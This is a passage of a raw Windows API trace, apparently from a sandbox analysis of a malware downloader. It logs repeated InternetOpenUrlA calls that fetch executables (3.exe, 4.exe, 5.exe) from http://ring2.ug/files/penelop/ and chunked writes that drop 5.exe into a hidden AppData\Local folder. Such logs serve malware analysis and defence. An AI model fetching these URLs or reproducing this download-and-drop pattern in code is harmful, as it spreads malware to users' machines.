hHeap=0x630000, dwFlags=0x0, lpMem=0x333bc58 | out: hHeap=0x630000) returned 1 [0079.804] InternetOpenUrlA (hInternet=0xcc0004, lpszUrl="http://ring2.ug/files/penelop/3.exe", lpszHeaders=0x0, dwHeadersLength=0x0, dwFlags=0x0, dwContext=0x0) returned 0xcc000c [0079.994] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b78ec8 | out: hHeap=0x630000) returned 1 [0079.994] HttpQueryInfoW (in: hRequest=0xcc000c, dwInfoLevel=0x20000013, lpBuffer=0x9b2d6d0, lpdwBufferLength=0x9b2d710, lpdwIndex=0x0 | out: lpBuffer=0x9b2d6d0*, lpdwBufferLength=0x9b2d710*=0x4, lpdwIndex=0x0) returned 1 [0079.994] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32d0db8 | out: hHeap=0x630000) returned 1 [0079.994] InternetOpenA (lpszAgent="Microsoft Internet Explorer", dwAccessType=0x0, lpszProxy=0x0, lpszProxyBypass=0x0, dwFlags=0x0) returned 0xcc0010 [0079.994] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x33330f0 [0079.994] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x84e) returned 0x333bc58 [0079.994] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x33330f0, cbMultiByte=-1, lpWideCharStr=0x333bc58, cchWideChar=1063 | out: lpWideCharStr="http://ring2.ug/files/penelop/4.exe") returned 36 [0079.994] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x850) returned 0x32d0db8 [0079.994] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x333bc58 | out: hHeap=0x630000) returned 1 [0079.994] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33330f0 | out: hHeap=0x630000) returned 1 [0079.994] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x850) returned 0x333bc58 [0079.994] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x827) returned 0x33515f0 [0079.994] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="http://ring2.ug/files/penelop/4.exe", cchWideChar=-1, lpMultiByteStr=0x33515f0, cbMultiByte=2087, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="http://ring2.ug/files/penelop/4.exe", lpUsedDefaultChar=0x0) returned 36 [0079.994] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x9b78ec8 [0079.994] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33515f0 | out: hHeap=0x630000) returned 1 [0079.994] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x333bc58 | out: hHeap=0x630000) returned 1 [0079.994] InternetOpenUrlA (hInternet=0xcc0010, lpszUrl="http://ring2.ug/files/penelop/4.exe", lpszHeaders=0x0, dwHeadersLength=0x0, dwFlags=0x0, dwContext=0x0) returned 0xcc0018 [0080.165] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b78ec8 | out: hHeap=0x630000) returned 1 [0080.165] HttpQueryInfoW (in: hRequest=0xcc0018, dwInfoLevel=0x20000013, lpBuffer=0x9b2d6d0, lpdwBufferLength=0x9b2d710, lpdwIndex=0x0 | out: lpBuffer=0x9b2d6d0*, lpdwBufferLength=0x9b2d710*=0x4, lpdwIndex=0x0) returned 1 [0080.166] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32d0db8 | out: hHeap=0x630000) returned 1 [0080.166] InternetOpenA (lpszAgent="Microsoft Internet Explorer", dwAccessType=0x0, lpszProxy=0x0, lpszProxyBypass=0x0, dwFlags=0x0) returned 0xcc001c [0080.166] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x3333160 [0080.166] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x84e) returned 0x333bc58 [0080.166] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3333160, cbMultiByte=-1, lpWideCharStr=0x333bc58, cchWideChar=1063 | out: lpWideCharStr="http://ring2.ug/files/penelop/5.exe") returned 36 [0080.166] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x850) returned 0x32d0db8 [0080.166] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x333bc58 | out: hHeap=0x630000) returned 1 [0080.166] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3333160 | out: hHeap=0x630000) returned 1 [0080.166] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x850) returned 0x333bc58 [0080.166] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x827) returned 0x33515f0 [0080.166] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="http://ring2.ug/files/penelop/5.exe", cchWideChar=-1, lpMultiByteStr=0x33515f0, cbMultiByte=2087, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="http://ring2.ug/files/penelop/5.exe", lpUsedDefaultChar=0x0) returned 36 [0080.166] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x9b78ec8 [0080.166] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33515f0 | out: hHeap=0x630000) returned 1 [0080.166] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x333bc58 | out: hHeap=0x630000) returned 1 [0080.166] InternetOpenUrlA (hInternet=0xcc001c, lpszUrl="http://ring2.ug/files/penelop/5.exe", lpszHeaders=0x0, dwHeadersLength=0x0, dwFlags=0x0, dwContext=0x0) returned 0xcc0024 [0080.358] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b78ec8 | out: hHeap=0x630000) returned 1 [0080.358] HttpQueryInfoW (in: hRequest=0xcc0024, dwInfoLevel=0x20000013, lpBuffer=0x9b2d6d0, lpdwBufferLength=0x9b2d710, lpdwIndex=0x0 | out: lpBuffer=0x9b2d6d0*, lpdwBufferLength=0x9b2d710*=0x4, lpdwIndex=0x0) returned 1 [0080.375] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x3333208 [0080.384] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3333208 | out: hHeap=0x630000) returned 1 [0080.384] lstrcpyA (in: lpString1=0x32cfd68, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\cc96d4d5-77d7-41f6-9d0f-85ea800861b4" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\cc96d4d5-77d7-41f6-9d0f-85ea800861b4") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\cc96d4d5-77d7-41f6-9d0f-85ea800861b4" [0080.384] PathAppendA (in: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\cc96d4d5-77d7-41f6-9d0f-85ea800861b4", pMore="5.exe" | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\cc96d4d5-77d7-41f6-9d0f-85ea800861b4\\5.exe") returned 1 [0080.392] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x32ce0d0 [0080.393] CreateFileA (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\cc96d4d5-77d7-41f6-9d0f-85ea800861b4\\5.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\cc96d4d5-77d7-41f6-9d0f-85ea800861b4\\5.exe"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x6b4 [0080.472] SetFilePointer (in: hFile=0x6b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0080.472] InternetReadFile (in: hFile=0xcc0024, lpBuffer=0x9b2d778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x9b2d6d8 | out: lpBuffer=0x9b2d778*, lpdwNumberOfBytesRead=0x9b2d6d8*=0x2800) returned 1 [0080.475] WriteFile (in: hFile=0x6b4, lpBuffer=0x9b2d778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x9b2d6dc, lpOverlapped=0x0 | out: lpBuffer=0x9b2d778*, lpNumberOfBytesWritten=0x9b2d6dc*=0x2800, lpOverlapped=0x0) returned 1 [0080.476] InternetReadFile (in: hFile=0xcc0024, lpBuffer=0x9b2d778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x9b2d6d8 | out: lpBuffer=0x9b2d778*, lpdwNumberOfBytesRead=0x9b2d6d8*=0x2800) returned 1 [0080.477] WriteFile (in: hFile=0x6b4, lpBuffer=0x9b2d778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x9b2d6dc, lpOverlapped=0x0 | out: lpBuffer=0x9b2d778*, lpNumberOfBytesWritten=0x9b2d6dc*=0x2800, lpOverlapped=0x0) returned 1 [0080.477] InternetReadFile (in: hFile=0xcc0024, lpBuffer=0x9b2d778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x9b2d6d8 | out: lpBuffer=0x9b2d778*, lpdwNumberOfBytesRead=0x9b2d6d8*=0x2800) returned 1 [0080.478] WriteFile (in: hFile=0x6b4, lpBuffer=0x9b2d778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x9b2d6dc, lpOverlapped=0x0 | out: lpBuffer=0x9b2d778*, lpNumberOfBytesWritten=0x9b2d6dc*=0x2800, lpOverlapped=0x0) returned 1 [0080.478] InternetReadFile (in: hFile=0xcc0024, lpBuffer=0x9b2d778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x9b2d6d8 | out: lpBuffer=0x9b2d778*, lpdwNumberOfBytesRead=0x9b2d6d8*=0x2800) returned 1 [0080.479] WriteFile (in: hFile=0x6b4, lpBuffer=0x9b2d778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x9b2d6dc, lpOverlapped=0x0 | out: lpBuffer=0x9b2d778*, lpNumberOfBytesWritten=0x9b2d6dc*=0x2800, lpOverlapped=0x0) returned 1 [0080.479] InternetReadFile (in: hFile=0xcc0024, lpBuffer=0x9b2d778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x9b2d6d8 | out: lpBuffer=0x9b2d778*, lpdwNumberOfBytesRead=0x9b2d6d8*=0x2800) returned 1 [0080.480] WriteFile (in: hFile=0x6b4, lpBuffer=0x9b2d778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x9b2d6dc, lpOverlapped=0x0 | out: lpBuffer=0x9b2d778*, lpNumberOfBytesWritten=0x9b2d6dc*=0x2800, lpOverlapped=0x0) returned 1 [0080.480] InternetReadFile (in: hFile=0xcc0024, lpBuffer=0x9b2d778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x9b2d6d8 | out: lpBuffer=0x9b2d778*, lpdwNumberOfBytesRead=0x9b2d6d8*=0x2800) returned 1 [0080.481] WriteFile (in: hFile=0x6b4, lpBuffer=0x9b2d778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x9b2d6dc, lpOverlapped=0x0 | out: lpBuffer=0x9b2d778*, lpNumberOfBytesWritten=0x9b2d6dc*=0x2800, lpOverlapped=0x0) returned 1 [0080.481] InternetReadFile (in: hFile=0xcc0024, lpBuffer=0x9b2d778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x9b2d6d8 | out: lpBuffer=0x9b2d778*, lpdwNumberOfBytesRead=0x9b2d6d8*=0x2800) returned 1 [0080.482] WriteFile (in: hFile=0x6b4, lpBuffer=0x9b2d778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x9b2d6dc, lpOverlapped=0x0 | out: lpBuffer=0x9b2d778*, lpNumberOfBytesWritten=0x9b2d6dc*=0x2800, lpOverlapped=0x0) returned 1 [0080.482] InternetReadFile (in: hFile=0xcc0024, lpBuffer=0x9b2d778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x9b2d6d8 | out: lpBuffer=0x9b2d778*, lpdwNumberOfBytesRead=0x9b2d6d8*=0x2800) returned 1 [0080.514] WriteFile (in: hFile=0x6b4, lpBuffer=0x9b2d778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x9b2d6dc, lpOverlapped=0x0 | out: lpBuffer=0x9b2d778*, lpNumberOfBytesWritten=0x9b2d6dc*=0x2800, lpOverlapped=0x0) returned 1 [0080.515] InternetReadFile (in: hFile=0xcc0024, lpBuffer=0x9b2d778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x9b2d6d8 | out: lpBuffer=0x9b2d778*, lpdwNumberOfBytesRead=0x9b2d6d8*=0x2800) returned 1 [0080.516] WriteFile (in: hFile=0x6b4, lpBuffer=0x9b2d778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x9b2d6dc, lpOverlapped=0x0 | out: lpBuffer=0x9b2d778*, lpNumberOfBytesWritten=0x9b2d6dc*=0x2800, lpOverlapped=0x0) returned 1 [0080.516] InternetReadFile (in: hFile=0xcc0024, lpBuffer=0x9b2d778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x9b2d6d8 | out: lpBuffer=0x9b2d778*, lpdwNumberOfBytesRead=0x9b2d6d8*=0x2800) returned 1 [0080.516] WriteFile (in: hFile=0x6b4, lpBuffer=0x9b2d778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x9b2d6dc, lpOverlapped=0x0 | out: lpBuffer=0x9b2d778*, lpNumberOfBytesWritten=0x9b2d6dc*=0x2800, lpOverlapped=0x0) returned 1 [0080.517] InternetReadFile (in: hFile=0xcc0024, lpBuffer=0x9b2d778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x9b2d6d8 | out: lpBuffer=0x9b2d778*, lpdwNumberOfBytesRead=0x9b2d6d8*=0x2800) returned 1 [0080.517] WriteFile (in: hFile=0x6b4, lpBuffer=0x9b2d778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x9b2d6dc, lpOverlapped=0x0 | out: lpBuffer=0x9b2d778*, lpNumberOfBytesWritten=0x9b2d6dc*=0x2800, lpOverlapped=0x0) returned 1 [0080.518] InternetReadFile (in: hFile=0xcc0024, lpBuffer=0x9b2d778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x9b2d6d8 | out: lpBuffer=0x9b2d778*, lpdwNumberOfBytesRead=0x9b2d6d8*=0x2800) returned 1 [0080.518] WriteFile (in: hFile=0x6b4, lpBuffer=0x9b2d778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x9b2d6dc, lpOverlapped=0x0 | out: lpBuffer=0x9b2d778*, lpNumberOfBytesWritten=0x9b2d6dc*=0x2800, lpOverlapped=0x0) returned 1 [0080.518] InternetReadFile (in: hFile=0xcc0024, lpBuffer=0x9b2d778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x9b2d6d8 | out: lpBuffer=0x9b2d778*, lpdwNumberOfBytesRead=0x9b2d6d8*=0x2800) returned 1 [0080.519] WriteFile (in: hFile=0x6b4, lpBuffer=0x9b2d778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x9b2d6dc, lpOverlapped=0x0 | out: lpBuffer=0x9b2d778*, lpNumberOfBytesWritten=0x9b2d6dc*=0x2800, lpOverlapped=0x0) returned 1 [0080.519] InternetReadFile (in: hFile=0xcc0024, lpBuffer=0x9b2d778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x9b2d6d8 | out: lpBuffer=0x9b2d778*, lpdwNumberOfBytesRead=0x9b2d6d8*=0x2800) returned 1 [0080.559] WriteFile (in: hFile=0x6b4, lpBuffer=0x9b2d778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x9b2d6dc, lpOverlapped=0x0 | out: lpBuffer=0x9b2d778*, lpNumberOfBytesWritten=0x9b2d6dc*=0x2800, lpOverlapped=0x0) returned 1 [0080.559] InternetReadFile (in: hFile=0xcc0024, lpBuffer=0x9b2d778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x9b2d6d8 | out: lpBuffer=0x9b2d778*, lpdwNumberOfBytesRead=0x9b2d6d8*=0x2800) returned 1 [0080.560] WriteFile (in: hFile=0x6b4, lpBuffer=0x9b2d778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x9b2d6dc, lpOverlapped=0x0 | out: lpBuffer=0x9b2d778*, lpNumberOfBytesWritten=0x9b2d6dc*=0x2800, lpOverlapped=0x0) returned 1 [0080.561] InternetReadFile (in: hFile=0xcc0024, lpBuffer=0x9b2d778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x9b2d6d8 | out: lpBuffer=0x9b2d778*, lpdwNumberOfBytesRead=0x9b2d6d8*=0x2800) returned 1 [0080.561] WriteFile (in: hFile=0x6b4, lpBuffer=0x9b2d778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x9b2d6dc, lpOverlapped=0x0 | out: lpBuffer=0x9b2d778*, lpNumberOfBytesWritten=0x9b2d6dc*=0x2800, lpOverlapped=0x0) returned 1 [0080.561] InternetReadFile (in: hFile=0xcc0024, lpBuffer=0x9b2d778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x9b2d6d8 | out: lpBuffer=0x9b2d778*, lpdwNumberOfBytesRead=0x9b2d6d8*=0x2800) returned 1 [0080.562] WriteFile (in: hFile=0x6b4, lpBuffer=0x9b2d778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x9b2d6dc, lpOverlapped=0x0 | out: lpBuffer=0x9b2d778*, lpNumberOfBytesWritten=0x9b2d6dc*=0x2800, lpOverlapped=0x0) returned 1 [0080.562] InternetReadFile (in: hFile=0xcc0024, lpBuffer=0x9b2d778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x9b2d6d8 | out: lpBuffer=0x9b2d778*, lpdwNumberOfBytesRead=0x9b2d6d8*=0x2800) returned 1 [0080.563] WriteFile (in: hFile=0x6b4, lpBuffer=0x9b2d778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x9b2d6dc, lpOverlapped=0x0 | out: lpBuffer=0x9b2d778*, lpNumberOfBytesWritten=0x9b2d6dc*=0x2800, lpOverlapped=0x0) returned 1 [0080.563] InternetReadFile (in: hFile=0xcc0024, lpBuffer=0x9b2d778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x9b2d6d8 | out: lpBuffer=0x9b2d778*, lpdwNumberOfBytesRead=0x9b2d6d8*=0x2800) returned 1 [0080.564] WriteFile (in: hFile=0x6b4, lpBuffer=0x9b2d778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x9b2d6dc, lpOverlapped=0x0 | out: lpBuffer=0x9b2d778*, lpNumberOfBytesWritten=0x9b2d6dc*=0x2800, lpOverlapped=0x0) returned 1 [0080.564] InternetReadFile (in: hFile=0xcc0024, lpBuffer=0x9b2d778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x9b2d6d8 | out: lpBuffer=0x9b2d778*, lpdwNumberOfBytesRead=0x9b2d6d8*=0x2800) returned 1 [0080.601] WriteFile (in: hFile=0x6b4, lpBuffer=0x9b2d778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x9b2d6dc, lpOverlapped=0x0 | out: lpBuffer=0x9b2d778*, lpNumberOfBytesWritten=0x9b2d6dc*=0x2800, lpOverlapped=0x0) returned 1 [0080.601] InternetReadFile (in: hFile=0xcc0024, lpBuffer=0x9b2d778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x9b2d6d8 | out: lpBuffer=0x9b2d778*, lpdwNumberOfBytesRead=0x9b2d6d8*=0x2800) returned 1 [0080.602] WriteFile (in: hFile=0x6b4, lpBuffer=0x9b2d778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x9b2d6dc, lpOverlapped=0x0 | out: lpBuffer=0x9b2d778*, lpNumberOfBytesWritten=0x9b2d6dc*=0x2800, lpOverlapped=0x0) returned 1 [0080.602] InternetReadFile (in: hFile=0xcc0024, lpBuffer=0x9b2d778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x9b2d6d8 | out: lpBuffer=0x9b2d778*, lpdwNumberOfBytesRead=0x9b2d6d8*=0x2800) returned 1 [0080.603] WriteFile (in: hFile=0x6b4, lpBuffer=0x9b2d778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x9b2d6dc, lpOverlapped=0x0 | out: lpBuffer=0x9b2d778*, lpNumberOfBytesWritten=0x9b2d6dc*=0x2800, lpOverlapped=0x0) returned 1 [0080.604] InternetReadFile (in: hFile=0xcc0024, lpBuffer=0x9b2d778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x9b2d6d8 | out: lpBuffer=0x9b2d778*, lpdwNumberOfBytesRead=0x9b2d6d8*=0x2800) returned 1 [0080.604] WriteFile (in: hFile=0x6b4, lpBuffer=0x9b2d778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x9b2d6dc, lpOverlapped=0x0 | out: lpBuffer=0x9b2d778*, lpNumberOfBytesWritten=0x9b2d6dc*=0x2800, lpOverlapped=0x0) returned 1 [0080.605] InternetReadFile (in: hFile=0xcc0024, lpBuffer=0x9b2d778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x9b2d6d8 | out: lpBuffer=0x9b2d778*, lpdwNumberOfBytesRead=0x9b2d6d8*=0x2800) returned 1 [0080.605] WriteFile (in: hFile=0x6b4, lpBuffer=0x9b2d778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x9b2d6dc, lpOverlapped=0x0 | out: lpBuffer=0x9b2d778*, lpNumberOfBytesWritten=0x9b2d6dc*=0x2800, lpOverlapped=0x0) returned 1 [0080.605] InternetReadFile (in: hFile=0xcc0024, lpBuffer=0x9b2d778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x9b2d6d8 | out: lpBuffer=0x9b2d778*, lpdwNumberOfBytesRead=0x9b2d6d8*=0x2800) returned 1 [0080.606] WriteFile (in: hFile=0x6b4, lpBuffer=0x9b2d778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x9b2d6dc, lpOverlapped=0x0 | out: lpBuffer=0x9b2d778*, lpNumberOfBytesWritten=0x9b2d6dc*=0x2800, lpOverlapped=0x0) returned 1 [0080.606] InternetReadFile (in: hFile=0xcc0024, lpBuffer=0x9b2d778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x9b2d6d8 | out: lpBuffer=0x9b2d778*, lpdwNumberOfBytesRead=0x9b2d6d8*=0x2800) returned 1 [0080.608] WriteFile (in: hFile=0x6b4, lpBuffer=0x9b2d778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x9b2d6dc, lpOverlapped=0x0 | out: lpBuffer=0x9b2d778*, lpNumberOfBytesWritten=0x9b2d6dc*=0x2800, lpOverlapped=0x0) returned 1 [0080.609] InternetReadFile (in: hFile=0xcc0024, lpBuffer=0x9b2d778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x9b2d6d8 | out: lpBuffer=0x9b2d778*, lpdwNumberOfBytesRead=0x9b2d6d8*=0x2800) returned 1 [0080.639] WriteFile (in: hFile=0x6b4, lpBuffer=0x9b2d778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x9b2d6dc, lpOverlapped=0x0 | out: lpBuffer=0x9b2d778*, lpNumberOfBytesWritten=0x9b2d6dc*=0x2800, lpOverlapped=0x0) returned 1 [0080.641] InternetReadFile (in: hFile=0xcc0024, lpBuffer=0x9b2d778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x9b2d6d8 | out: lpBuffer=0x9b2d778*, lpdwNumberOfBytesRead=0x9b2d6d8*=0x2800) returned 1 [0080.644] WriteFile (in: hFile=0x6b4, lpBuffer=0x9b2d778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x9b2d6dc, lpOverlapped=0x0 | out: lpBuffer=0x9b2d778*, lpNumberOfBytesWritten=0x9b2d6dc*=0x2800, lpOverlapped=0x0) returned 1 [0080.645] InternetReadFile (in: hFile=0xcc0024, lpBuffer=0x9b2d778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x9b2d6d8 | out: lpBuffer=0x9b2d778*, lpdwNumberOfBytesRead=0x9b2d6d8*=0x2800) returned 1 [0080.646] WriteFile (in: hFile=0x6b4, lpBuffer=0x9b2d778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x9b2d6dc, lpOverlapped=0x0 | out: lpBuffer=0x9b2d778*, lpNumberOfBytesWritten=0x9b2d6dc*=0x2800, lpOverlapped=0x0) returned 1 [0080.646] InternetReadFile (in: hFile=0xcc0024, lpBuffer=0x9b2d778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x9b2d6d8 | out: lpBuffer=0x9b2d778*, lpdwNumberOfBytesRead=0x9b2d6d8*=0x2800) returned 1 [0080.647] WriteFile (in: hFile=0x6b4, lpBuffer=0x9b2d778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x9b2d6dc, lpOverlapped=0x0 | out: lpBuffer=0x9b2d778*, lpNumberOfBytesWritten=0x9b2d6dc*=0x2800, lpOverlapped=0x0) returned 1 [0080.647] InternetReadFile (in: hFile=0xcc0024, lpBuffer=0x9b2d778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x9b2d6d8 | out: lpBuffer=0x9b2d778*, lpdwNumberOfBytesRead=0x9b2d6d8*=0x2800) returned 1 [0080.648] WriteFile (in: hFile=0x6b4, lpBuffer=0x9b2d778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x9b2d6dc, lpOverlapped=0x0 | out: lpBuffer=0x9b2d778*, lpNumberOfBytesWritten=0x9b2d6dc*=0x2800, lpOverlapped=0x0) returned 1 [0080.648] InternetReadFile (in: hFile=0xcc0024, lpBuffer=0x9b2d778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x9b2d6d8 | out: lpBuffer=0x9b2d778*, lpdwNumberOfBytesRead=0x9b2d6d8*=0x2800) returned 1 [0080.649] WriteFile (in: hFile=0x6b4, lpBuffer=0x9b2d778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x9b2d6dc, lpOverlapped=0x0 | out: lpBuffer=0x9b2d778*, lpNumberOfBytesWritten=0x9b2d6dc*=0x2800, lpOverlapped=0x0) returned 1 [0080.649] InternetReadFile (in: hFile=0xcc0024, lpBuffer=0x9b2d778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x9b2d6d8 | out: lpBuffer=0x9b2d778*, lpdwNumberOfBytesRead=0x9b2d6d8*=0x2800) returned 1 [0080.650] WriteFile (in: hFile=0x6b4, lpBuffer=0x9b2d778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x9b2d6dc, lpOverlapped=0x0 | out: lpBuffer=0x9b2d778*, lpNumberOfBytesWritten=0x9b2d6dc*=0x2800, lpOverlapped=0x0) returned 1 [0080.650] InternetReadFile (in: hFile=0xcc0024, lpBuffer=0x9b2d778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x9b2d6d8 | out: lpBuffer=0x9b2d778*, lpdwNumberOfBytesRead=0x9b2d6d8*=0x2800) returned 1 [0080.651] WriteFile (in: hFile=0x6b4, lpBuffer=0x9b2d778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x9b2d6dc, lpOverlapped=0x0 | out: lpBuffer=0x9b2d778*, lpNumberOfBytesWritten=0x9b2d6dc*=0x2800, lpOverlapped=0x0) returned 1 [0080.651] InternetReadFile (in: hFile=0xcc0024, lpBuffer=0x9b2d778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x9b2d6d8 | out: lpBuffer=0x9b2d778*, lpdwNumberOfBytesRead=0x9b2d6d8*=0x2800) returned 1 [0080.652] WriteFile (in: hFile=0x6b4, lpBuffer=0x9b2d778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x9b2d6dc, lpOverlapped=0x0 | out: lpBuffer=0x9b2d778*, lpNumberOfBytesWritten=0x9b2d6dc*=0x2800, lpOverlapped=0x0) returned 1 [0080.653] InternetReadFile (in: hFile=0xcc0024, lpBuffer=0x9b2d778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x9b2d6d8 | out: lpBuffer=0x9b2d778*, lpdwNumberOfBytesRead=0x9b2d6d8*=0x2800) returned 1 [0080.653] WriteFile (in: hFile=0x6b4, lpBuffer=0x9b2d778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x9b2d6dc, lpOverlapped=0x0 | out: lpBuffer=0x9b2d778*, lpNumberOfBytesWritten=0x9b2d6dc*=0x2800, lpOverlapped=0x0) returned 1 [0080.653] InternetReadFile (in: hFile=0xcc0024, 